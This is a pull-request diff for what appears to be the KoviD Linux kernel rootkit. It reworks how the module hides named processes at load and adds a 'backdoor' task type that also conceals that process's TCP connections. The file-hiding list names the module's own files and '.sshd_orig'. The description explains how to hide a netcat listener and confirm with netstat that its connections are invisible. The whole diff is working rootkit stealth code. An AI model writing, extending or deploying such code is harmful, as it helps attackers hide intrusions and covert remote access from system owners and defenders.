### PR TITLE
Modify backdoor autohide o load

### DIFF
--- a/src/kovid.c
+++ b/src/kovid.c
@@ -741,8 +741,10 @@ cont:
     fs_add_name_ro(kv_hide_str_on_load);
 
     /** hide magic filenames, directories and processes */
-    fs_add_name_ro(kv_hide_ps_on_load);
+    fs_add_name_ro(kv_get_hide_ps_names());
+
     kv_scan_and_hide();
+
 
 #ifndef DEBUG_RING_BUFFER
     /** *pr_info because it must be shown even if DEPLOY=1 */

--- a/src/lkm.h
+++ b/src/lkm.h
@@ -160,15 +160,6 @@ char *kv_util_random_AZ_string(size_t);
 /** VM operations */
 unsigned long kv_get_elf_vm_start(pid_t);
 
- /*
-  * Hide these process names during load
-  * children included
- */
-static const char *kv_hide_ps_on_load[] = {
-    "whitenose", "pinknose", "rednose", "blacknose",
-    "greynose", "purplenose", "bluenose", NULL
-};
-
 /*
  * Hide these names from write() fs output
  */
@@ -176,6 +167,53 @@ static const char *kv_hide_str_on_load[] = {
     ".kovid", "kovid", "kovid.ko", ".kv.ko",
     ".lm.sh", ".sshd_orig", NULL
 };
+
+enum {
+    KV_TASK,
+    /* The following indicates a backdoor
+     * task that can also hide its
+     * tcp traffic
+     */
+    KV_TASK_BD
+};
+
+struct _kv_hide_ps_on_load {
+    const char *name;
+    int type;
+} ;
+
+ /*
+  * Hide these process names at insmod
+ */
+static struct _kv_hide_ps_on_load kv_hide_ps_on_load[] = {
+    {"whitenose-example", KV_TASK},
+    {"pinknose-example", KV_TASK},
+    {"rednose-example", KV_TASK},
+    {"blacknose-example", KV_TASK},
+    {"greynose-example", KV_TASK},
+    {"purplenose-example", KV_TASK},
+
+    // Uncomment, recompile and try nc:
+    //{"nc", KV_TASK_BD},
+
+    {NULL, -1},
+};
+
+/*
+ * Helper that returns the list of names to hide on load
+ */
+static inline const char **kv_get_hide_ps_names(void) {
+    int i;
+    // XXX: using fixed maxsize kv_hide_ps_on_load now
+    static const char *names[256];
+    if (!*names) {
+        size_t maxnames = sizeof(names) / sizeof(names[0]);
+        for (i = 0; i < maxnames && kv_hide_ps_on_load[i].name != NULL; ++i) {
+            names[i] = kv_hide_ps_on_load[i].name;
+        }
+    }
+    return names;
+}
 
 
 // PP_NARG from

--- a/src/pid.c
+++ b/src/pid.c
@@ -458,28 +458,15 @@ void kv_scan_and_hide(void) {
     struct task_struct *t;
 
     for_each_process(t) {
-
         short i = 0;
-        struct fs_file_node *fnode;
 
         if (kv_find_hidden_task(t)) continue;
-        if (!(fnode = fs_get_file_node(t))) continue;
-
-        for (; kv_hide_ps_on_load[i] != NULL; ++i) {
-            if (strncmp(kv_hide_ps_on_load[i], t->comm, strlen(kv_hide_ps_on_load[i]))) continue;
-            prinfo("Hide task name '%s' from '%s' of pid %d\n", t->comm, fnode->filename, t->pid);
-            /**
-             * notice that any netapp added here
-             * will NOT be killed if kv is unloaded
-             * In reality an application that is listed in kv_hide_ps_on_load will be handled
-             * in the same way as if you manually hide a parent process:
-             *  echo <pid of parent> >/proc/kv
-             */
-            kv_hide_task_by_pid(t->pid, 0 /* not a backdoor */, CHILDREN /* hide children */);
+        for (; kv_hide_ps_on_load[i].name != NULL; ++i) {
+            if (strncmp(kv_hide_ps_on_load[i].name, t->comm, strlen(kv_hide_ps_on_load[i].name))) continue;
+            prinfo("Hide task name '%s' of pid %d\n", t->comm, t->pid);
+            kv_hide_task_by_pid(t->pid, kv_hide_ps_on_load[i].type, CHILDREN);
             break;
         }
-
-        kfree(fnode);
     }
 }
 


### PR DESCRIPTION
On pid.c you can uncomment this, for example:
//{"nc", KV_TASK_BD},

recompile + load nc + load kv
check tcp connections with netstat